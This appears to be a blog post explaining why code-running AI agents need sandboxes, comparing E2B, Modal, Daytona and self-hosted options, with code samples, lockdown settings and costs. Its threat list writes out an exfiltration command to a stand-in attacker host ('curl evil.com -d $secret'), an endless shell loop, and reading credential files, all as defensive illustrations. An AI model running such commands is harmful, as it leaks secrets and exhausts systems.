Why do agents need sandboxes?

Code-running agents (data analysis, programming assistants, automation) run untrusted-by-design code. A sandbox prevents that code from escalating, exfiltrating data, or accessing other tenants. Without it, you're one prompt injection away from a breach.

E2B vs Modal vs Daytona?

E2B is purpose-built for AI agents (fastest spin-up, code interpreter shape). Modal is more general (any container workload). Daytona focuses on dev environments. For agents specifically, E2B is the easiest path; Modal scales to bigger workloads.

Can I run sandboxes inside my own cloud?

Yes — Firecracker microVMs (the AWS Lambda primitive), Kata Containers, or gVisor. More ops than managed but full control. For most teams under 100 sandboxes/min, managed wins on TCO.

Sandboxed Code Execution for AI Agents — E2B, Modal, Daytona, and the 2026 Stack

Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is the working guide to sandboxed code execution for agents in 2026.

Why sandboxes

Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:

Filesystem leakage — /etc/passwd, AWS credentials, other users’ data.
Network exfiltration — curl evil.com -d $secret.
Resource exhaustion — while true; do :; done.
Privilege escalation — kernel exploits, container breakouts.

A sandbox is the answer. The question is which one.

The 2026 stack

	Type	Spin-up	Strengths
E2B	Managed Firecracker	<500ms	Built for AI agents, code-interpreter shape, GitHub auth
Modal	Managed serverless	1–2s	General compute, GPU support, big batches
Daytona	Managed dev envs	2–5s	IDE-shaped, good for dev tools
Fly Machines	Managed Firecracker	200ms	Generic, very cheap
AWS Lambda	Managed	<100ms	Mature, restrictive (no GPU, 15min limit)
Cloudflare Workers / Sandbox	Managed isolates	10ms	V8 only, very fast, limited
Daytona / Codespaces	Containers	3–10s	Persistent dev experience
Self-host Firecracker	Self-host	200ms	Full control
gVisor	Self-host	100ms	Container-style sandbox

E2B — the AI-native choice

E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.

from e2b_code_interpreter import Sandbox

with Sandbox() as sb:
    result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
    print(result.text)

    # Upload a file
    sb.files.write("/tmp/script.py", "print('hi')")

    # Run a shell command
    out = sb.commands.run("ls -la /tmp")

What’s good:

Fast spin-up. Firecracker microVM under the hood.
Persistent state within a sandbox session.
File and command APIs — most agent needs.
Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
Internet access (allowlist configurable).

For a code interpreter for an LLM, E2B is the path of least resistance.

For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.

import modal

app = modal.App("agent-runner")

@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
    import pandas as pd
    from io import StringIO
    df = pd.read_csv(StringIO(csv_text))
    return df.describe().to_json()

# Call from agent:
result = analyze.remote(csv_data)

Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.

Tool integration with an LLM

@tool
async def run_python(code: str) -> str:
    """Run Python code in a sandbox. Returns stdout + stderr."""
    async with E2BSandbox() as sb:
        try:
            result = await sb.run_code(code, timeout=30)
            return result.text or result.error or "(no output)"
        except Exception as e:
            return f"sandbox error: {e}"

Wire to an agent :

agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})

The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.

What to lock down

For each sandbox session, decide:

Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
Filesystem: scratch only / mount specific dirs / read-only.
Time limit: 30 seconds is generous for most code; cap aggressively.
Memory limit: 1 GB for code interpreters; less for narrow tasks.
CPU limit: 1 core usually plenty.
Egress data: cap bytes; alert on outliers.

E2B and Modal both expose these. Self-host and you set them yourself.

When self-hosted wins

Strict compliance (data must not leave VPC).
High volume (>100 sandboxes/min sustained — managed cost rises).
Specific networking needs (custom egress filtering).
Custom base images that aren’t a fit for managed.

For most teams under that threshold, managed (E2B / Modal) wins.

Common patterns

1. Per-conversation sandbox

The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.

2. Per-call sandbox

Stateless: each run_python spins up fresh. Simple, slower, sometimes wasteful (re-imports pandas every call).

3. Pool of warm sandboxes

For low-latency apps, keep N sandboxes warm. New requests grab from the pool. Slightly more ops; sub-100ms response.

4. Sandboxed agents (recursive)

The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).

Cost reality

E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.

Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.

Common mistakes

1. No timeout

Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.

2. Network wide-open

The agent emits curl, exfils data. Always allowlist.

3. State across users

Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.

4. Logging code without redaction

The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.

5. No resource caps

A misbehaving agent can OOM the sandbox host. Caps protect everyone.

What I’d build today

For a new agent product that runs code:

E2B for the sandbox (managed, fast, agent-shaped).
A run_python and run_shell tool wired to the agent.
Sandbox per user session, killed on disconnect.
30-second timeout, 1 GB memory cap by default.
Network allowlist for the APIs the agent should reach.
Logging + alerting on long runs and failed sandboxes.

Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.

Read this next

If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev .

Building something AI-, backend-, or data-heavy and want a second pair of eyes? I do consulting and freelance work — see my projects and ways to reach me at rajpoot.dev .

Why sandboxes#

The 2026 stack#

E2B — the AI-native choice#

Modal — when you need more#

Tool integration with an LLM#

What to lock down#

When self-hosted wins#

Common patterns#

1. Per-conversation sandbox#

2. Per-call sandbox#

3. Pool of warm sandboxes#

4. Sandboxed agents (recursive)#

Cost reality#

Common mistakes#

1. No timeout#

2. Network wide-open#

3. State across users#

4. Logging code without redaction#

5. No resource caps#

What I’d build today#

Read this next#